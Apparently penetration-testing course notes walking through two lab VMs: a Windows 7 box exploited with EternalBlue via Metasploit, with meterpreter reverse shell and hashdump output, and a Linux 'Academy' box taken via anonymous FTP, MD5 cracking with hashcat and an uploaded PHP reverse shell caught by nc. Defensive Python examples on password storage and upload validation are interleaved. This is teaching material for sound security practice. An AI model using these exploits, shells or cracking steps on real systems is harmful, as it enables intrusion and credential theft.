Two other courses on Windows & Linux Privilege Escalation.
New capstone boxes are available here: https://drive.google.com/drive/folders/1VXEuyySgzsSo-MYmyCareTnJ5rAeVKeH
- Import Blue.ovf in VMware, set the network settings to NAT, and allow 4 GB of memory if you can.
- Log in as an admin to get the IP via cmd and ipconfig.
- On your Kali machine, ping 192.168.92.130 to check that you can see it.
- scanning with
nmap -T4 -p- -A 192.168.92.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 08:32 EDT
Nmap scan report for 192.168.92.130
Host is up (0.00070s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:C8:FA:61 (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: WIN-845Q99OO4PP; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: WIN-845Q99OO4PP, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:c8:fa:61 (VMware)
|_clock-skew: mean: 1h20m00s, deviation: 2h18m33s, median: 0s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: WIN-845Q99OO4PP
| NetBIOS computer name: WIN-845Q99OO4PP\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-07-22T08:33:49-04:00
| smb2-time:
| date: 2024-07-22T12:33:50
|_ start_date: 2024-07-22T18:09:06
TRACEROUTE
HOP RTT ADDRESS
1 0.70 ms 192.168.92.130
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.28 seconds
Notes
Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1) + port 445 open: MS17-010 (EternalBlue) exploit
We can confirm it with the nmap script or the msfconsole auxiliary scanner (search for eternalblue).
nmap --script smb-vuln-ms17-010 -p445 192.168.92.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 08:59 EDT
Nmap scan report for 192.168.92.130
Host is up (0.00060s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:C8:FA:61 (VMware)
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
- Launch Metasploit:
msfconsole
- Search for the MS17-010 Exploit:
search ms17-010
- Select the Exploit:
use exploit/windows/smb/ms17_010_eternalblue
- Set the Target IP:
set RHOSTS 192.168.92.130
- Set the Payload:
set PAYLOAD windows/x64/meterpreter/reverse_tcp
(this is an enterprise machine)
- Run the Exploit:
exploit
(or check, to only confirm the vulnerability; you don't want to exploit certain sensitive targets)
exploit
[*] Started reverse TCP handler on 192.168.92.128:4444
[*] 192.168.92.130:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.92.130:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.92.130:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.92.130:445 - The target is vulnerable.
[*] 192.168.92.130:445 - Connecting to target for exploitation.
[+] 192.168.92.130:445 - Connection established for exploitation.
[+] 192.168.92.130:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.92.130:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.92.130:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.92.130:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.92.130:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.92.130:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.92.130:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.92.130:445 - Sending all but last fragment of exploit packet
[*] 192.168.92.130:445 - Starting non-paged pool grooming
[+] 192.168.92.130:445 - Sending SMBv2 buffers
[+] 192.168.92.130:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.92.130:445 - Sending final SMBv2 buffers.
[*] 192.168.92.130:445 - Sending last fragment of exploit packet!
[*] 192.168.92.130:445 - Receiving response from exploit packet
[+] 192.168.92.130:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.92.130:445 - Sending egg to corrupted connection.
[*] 192.168.92.130:445 - Triggering free of corrupted buffer.
[*] Sending stage (201798 bytes) to 192.168.92.130
[*] Meterpreter session 1 opened (192.168.92.128:4444 -> 192.168.92.130:49180) at 2024-07-22 09:03:05 -0400
[+] 192.168.92.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.92.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.92.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Results:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeImpersonatePrivilege
SeTcbPrivilege
Hashdump to get admin hash.
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:f580a1940b1f6759fbdd9f5c482ccdbb:::
user:1000:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
For manual exploitation, search GitHub for eternalblue and look for a detailed walkthrough, e.g. https://github.com/3ndG4me/AutoBlue-MS17-010
- 1 GB of memory is enough, NAT for network.
- Log in with root:tcm, run dhclient, then ip a to get the IP.
- scanning with
nmap -T4 -p- -A 192.168.92.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 10:31 EDT
Nmap scan report for 192.168.92.131
Host is up (0.00082s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1000 1000 776 May 30 2021 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.92.128
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 c7:44:58:86:90:fd:e4:de:5b:0d:bf:07:8d:05:5d:d7 (RSA)
| 256 78:ec:47:0f:0f:53:aa:a6:05:48:84:80:94:76:a6:23 (ECDSA)
|_ 256 99:9c:39:11:dd:35:53:a0:29:11:20:c7:f8:bf:71:a4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:9E:E0:5D (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.82 ms 192.168.92.131
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.49 seconds
Notes
80 - 192.168.92.131 - 16:37
default webpage - Apache/2.4.38 - php
404 - Debian means linux
phpmyadmin - http://192.168.92.131/phpmyadmin
/academy
/academy/admin
/academy/db
Apache version is outdated
ftp - anonymous login possible
info disclosure - note.txt - sensitive info
22 - OpenSSH 7.9p1 Debian 10+deb10u2
info disclosure - SSH Host Keys: RSA, ECDSA, and ED25519 keys are available
Usually we don't start with SSH; only if we have a weak password or want to see whether the client detects brute-force attempts.
Log in to FTP with anonymous as the username and a blank password.
ftp 192.168.92.131
Connected to 192.168.92.131.
220 (vsFTPd 3.0.3)
Name (192.168.92.131:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||45458|)
150 Opening BINARY mode data connection for note.txt (776 bytes).
100% |****************************************************************************************************************************************| 776 329.05 KiB/s 00:00 ETA
226 Transfer complete.
776 bytes received in 00:00 (34.13 KiB/s)
ftp>
Hello Heath !
Grimmie has setup the test website for the new academy.
I told him not to use the same password everywhere, he will change it ASAP.
I couldn't create a user via the admin panel, so instead I inserted directly into the database with the following command:
INSERT INTO `students` (`StudentRegno`, `studentPhoto`, `password`, `studentName`, `pincode`, `session`, `department`, `semester`, `cgpa`, `creationdate`, `updationDate`) VALUES
('10201321', '', 'cd73502828457d15655bbd7a63fb0bc8', 'Rum Ham', '777777', '', '', '', '7.60', '2021-05-29 14:36:56', '');
The StudentRegno number is what you use for login.
Le me know what you think of this open-source project, it's from 2020 so it should be secure... right ?
We can always adapt it to our needs.
-jdelta
- run hash-identifier on the hash from note.txt
- locate rockyou.txt
- mousepad hashes.txt to save the hash to a file
- hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt (-m 0 is the raw MD5 mode)
It's better to use a computer with a GPU to crack passwords.
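Why the digest in the note's INSERT falls to a wordlist in seconds, and what the application should have stored instead. This is an added example, not code from the course or from hashcat: the wordlist is a constructed stand-in for rockyou.txt, and make_record/verify are an assumed replacement scheme, not the academy app's own functions.

```python
"""Unsalted MD5 (as inserted into the students table) versus salted PBKDF2.

Added example, not the course's or hashcat's code. identify() mimics what
hash-identifier does from length and charset; crack_md5() is the whole
dictionary attack hashcat -m 0 performs, minus the GPU; make_record()/
verify() show the storage scheme that makes a shared wordlist lookup useless.
"""
import hashlib
import hmac
import secrets

TARGET = "cd73502828457d15655bbd7a63fb0bc8"   # password column from note.txt

# Constructed stand-in for rockyou.txt; a handful of entries is enough here.
WORDLIST = ["password", "123456", "academy", "student", "letmein"]


def identify(hash_hex):
    """Cheap hash-identifier: guess the family from length and charset."""
    h = hash_hex.strip().lower()
    if not all(c in "0123456789abcdef" for c in h):
        return "not a raw hex digest (salted/encoded form such as $...$)"
    return {32: "MD5 or NTLM (hashcat -m 0 / -m 1000)",
            40: "SHA-1 (hashcat -m 100)",
            64: "SHA-256 (hashcat -m 1400)"}.get(len(h), f"unknown ({len(h)} hex chars)")


def crack_md5(target_hex, words):
    """Unsalted MD5: one digest per candidate, compare, done. No per-user
    cost, so one pass over the wordlist breaks every row that used it."""
    want = target_hex.lower()
    for w in words:
        if hashlib.md5(w.encode()).hexdigest() == want:
            return w
    return None


# --- what the application should have stored instead ---------------------

ITERATIONS = 600_000   # PBKDF2-HMAC-SHA256 work factor (OWASP 2023 guidance)


def make_record(password):
    """Per-user random salt plus a slow KDF; store salt, cost and digest."""
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return {"salt": salt.hex(), "iterations": ITERATIONS, "hash": dk.hex()}


def verify(record, password):
    """Recompute with the stored salt and compare in constant time."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(record["salt"]), record["iterations"])
    return hmac.compare_digest(dk.hex(), record["hash"])


def salted_records_differ(password):
    """Two users with the same password get different digests, so a cracked
    row reveals nothing about another and no precomputed table applies."""
    a, b = make_record(password), make_record(password)
    return a["hash"] != b["hash"]


if __name__ == "__main__":
    print(identify(TARGET))
    print("cracked:", crack_md5(TARGET, WORDLIST))
    rec = make_record("student")
    print("pbkdf2 verify:", verify(rec, "student"), verify(rec, "Student"))
    print("same password, different digests:", salted_records_differ("student"))
```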
Notes
cd73502828457d15655bbd7a63fb0bc8 is student
able to connect to the academy profile
able to upload a photo (code execution?)
We don't know where note.txt is located; if it was at the root, we could upload and execute some malware.
nikto -h http://192.168.92.131
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.92.131
+ Target Hostname: 192.168.92.131
+ Target Port: 80
+ Start Time: 2024-07-22 10:40:48 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5c37b0dee585e, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: HEAD, GET, POST, OPTIONS .
+ /phpmyadmin/changelog.php: Uncommon header 'x-ob_mode' found, with contents: 1.
+ /phpmyadmin/changelog.php: Cookie goto created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /phpmyadmin/changelog.php: Cookie back created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /phpmyadmin/: phpMyAdmin directory found.
+ /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. See: https://typo3.org/
+ 8254 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2024-07-22 10:41:08 (GMT-4) (20 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
dirb http://192.168.92.131
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Jul 23 02:27:32 2024
URL_BASE: http://192.168.92.131/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.92.131/ ----
+ http://192.168.92.131/index.html (CODE:200|SIZE:10701)
==> DIRECTORY: http://192.168.92.131/phpmyadmin/
+ http://192.168.92.131/server-status (CODE:403|SIZE:279)
---- Entering directory: http://192.168.92.131/phpmyadmin/ ----
+ http://192.168.92.131/phpmyadmin/ChangeLog (CODE:200|SIZE:17598)
==> DIRECTORY: http://192.168.92.131/phpmyadmin/doc/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/examples/
+ http://192.168.92.131/phpmyadmin/favicon.ico (CODE:200|SIZE:22486)
+ http://192.168.92.131/phpmyadmin/index.php (CODE:200|SIZE:14555)
==> DIRECTORY: http://192.168.92.131/phpmyadmin/js/
+ http://192.168.92.131/phpmyadmin/libraries (CODE:403|SIZE:279)
+ http://192.168.92.131/phpmyadmin/LICENSE (CODE:200|SIZE:18092)
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/
+ http://192.168.92.131/phpmyadmin/phpinfo.php (CODE:200|SIZE:14557)
+ http://192.168.92.131/phpmyadmin/README (CODE:200|SIZE:1520)
+ http://192.168.92.131/phpmyadmin/robots.txt (CODE:200|SIZE:26)
+ http://192.168.92.131/phpmyadmin/setup (CODE:401|SIZE:461)
==> DIRECTORY: http://192.168.92.131/phpmyadmin/sql/
+ http://192.168.92.131/phpmyadmin/templates (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.92.131/phpmyadmin/themes/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/vendor/
---- Entering directory: http://192.168.92.131/phpmyadmin/doc/ ----
==> DIRECTORY: http://192.168.92.131/phpmyadmin/doc/html/
---- Entering directory: http://192.168.92.131/phpmyadmin/examples/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/js/ ----
==> DIRECTORY: http://192.168.92.131/phpmyadmin/js/transformations/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/js/vendor/
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/ ----
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/ar/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/az/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/be/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/bg/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/ca/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/cs/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/da/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/de/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/el/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/es/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/et/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/fi/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/fr/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/gl/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/hu/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/ia/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/id/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/it/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/ja/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/ko/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/lt/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/nl/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/pl/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/pt/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/pt_BR/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/ro/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/ru/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/si/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/sk/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/sl/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/sq/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/sv/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/th/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/tr/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/uk/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/vi/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/zh_CN/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/zh_TW/
---- Entering directory: http://192.168.92.131/phpmyadmin/sql/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/themes/ ----
==> DIRECTORY: http://192.168.92.131/phpmyadmin/themes/original/
---- Entering directory: http://192.168.92.131/phpmyadmin/vendor/ ----
==> DIRECTORY: http://192.168.92.131/phpmyadmin/vendor/composer/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/vendor/google/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/vendor/phpmyadmin/
---- Entering directory: http://192.168.92.131/phpmyadmin/doc/html/ ----
==> DIRECTORY: http://192.168.92.131/phpmyadmin/doc/html/_images/
+ http://192.168.92.131/phpmyadmin/doc/html/index.html (CODE:200|SIZE:14929)
---- Entering directory: http://192.168.92.131/phpmyadmin/js/transformations/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/js/vendor/ ----
==> DIRECTORY: http://192.168.92.131/phpmyadmin/js/vendor/jquery/
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/ar/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/az/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/be/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/bg/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/ca/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/cs/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/da/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/de/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/el/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/es/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/et/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/fi/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/fr/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/gl/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/hu/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/ia/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/id/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/it/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/ja/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/ko/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/lt/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/nl/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/pl/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/pt/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/pt_BR/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/ro/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/ru/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/si/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/sk/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/sl/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/sq/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/sv/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/th/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/tr/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/uk/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/vi/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/zh_CN/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/zh_TW/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/themes/original/ ----
==> DIRECTORY: http://192.168.92.131/phpmyadmin/themes/original/css/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/themes/original/img/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/themes/original/jquery/
---- Entering directory: http://192.168.92.131/phpmyadmin/vendor/composer/ ----
+ http://192.168.92.131/phpmyadmin/vendor/composer/LICENSE (CODE:200|SIZE:1070)
---- Entering directory: http://192.168.92.131/phpmyadmin/vendor/google/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/vendor/phpmyadmin/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/doc/html/_images/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/js/vendor/jquery/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/themes/original/css/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/themes/original/img/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/themes/original/jquery/ ----
==> DIRECTORY: http://192.168.92.131/phpmyadmin/themes/original/jquery/images/
---- Entering directory: http://192.168.92.131/phpmyadmin/themes/original/jquery/images/ ----
-----------------
END_TIME: Tue Jul 23 02:31:17 2024
DOWNLOADED: 276720 - FOUND: 14
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.92.131/FUZZ
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.92.131/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
# on atleast 2 different hosts [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 1ms]
# [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 5ms]
# directory-list-2.3-medium.txt [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 6ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 5ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 5ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 6ms]
# [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 5ms]
# Priority ordered case sensative list, where entries were found [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 13ms]
# Copyright 2007 James Fisher [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 199ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 225ms]
# [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 415ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 449ms]
# [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 471ms]
[Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 525ms]
academy [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 1ms]
phpmyadmin [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 2ms]
[Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 7ms]
server-status [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 6ms]
:: Progress: [220560/220560] :: Job [1/1] :: 6060 req/sec :: Duration: [0:00:46] :: Errors: 0 ::
ffuf is faster here because it only looks one level deep (no recursion into found directories).
- We try to upload a profile photo; it is stored at studentphoto/boys-profile-picture-screenshot.jpg
- We can upload PHP scripts, like a web shell or a payload: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
- Edit the IP to your Kali machine's before uploading, and open a port listener:
nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.131] 58432
whoami
www-data
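The shell above exists because the photo upload kept the client's filename, trusted its extension and wrote it into a directory Apache serves with PHP enabled. The validator below is an added example (not the Academy application's code; validate_photo, check and the sample uploads are assumed names and constructed data) showing the checks that would have refused the .php upload and its common look-alikes.

```python
"""Hardened handling for a 'profile photo' upload.

Added example, not the Academy app's code. Each check corresponds to one
way the studentphoto/ upload was abusable: wrong extension, extension
spoofing via content, PHP hidden inside a valid image, and client control
of the stored path/name.
"""
import os
import secrets

# Magic bytes of the only image types accepted (constructed allow-list).
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
}
PHP_TAGS = (b"<?php", b"<?=")


class UploadRejected(ValueError):
    """Raised with a short reason when an upload fails validation."""


def validate_photo(client_name, content):
    """Return a server-side filename for an acceptable image, else raise.

    1. Only the final extension counts and it must be allow-listed, so
       'shell.php' is refused and 'shell.php.jpg' is judged as a jpg.
    2. The bytes must start with that type's magic, so PHP source with a
       .jpg name is refused.
    3. No PHP open tag may appear anywhere, so a real JPEG with a script
       appended (polyglot) is refused.
    4. The stored name is random and carries only the validated extension,
       so the client controls neither the path nor any extra extensions.
    Defence in depth, outside this function: serve the upload directory
    with PHP execution disabled (Apache: php_admin_flag engine off) or
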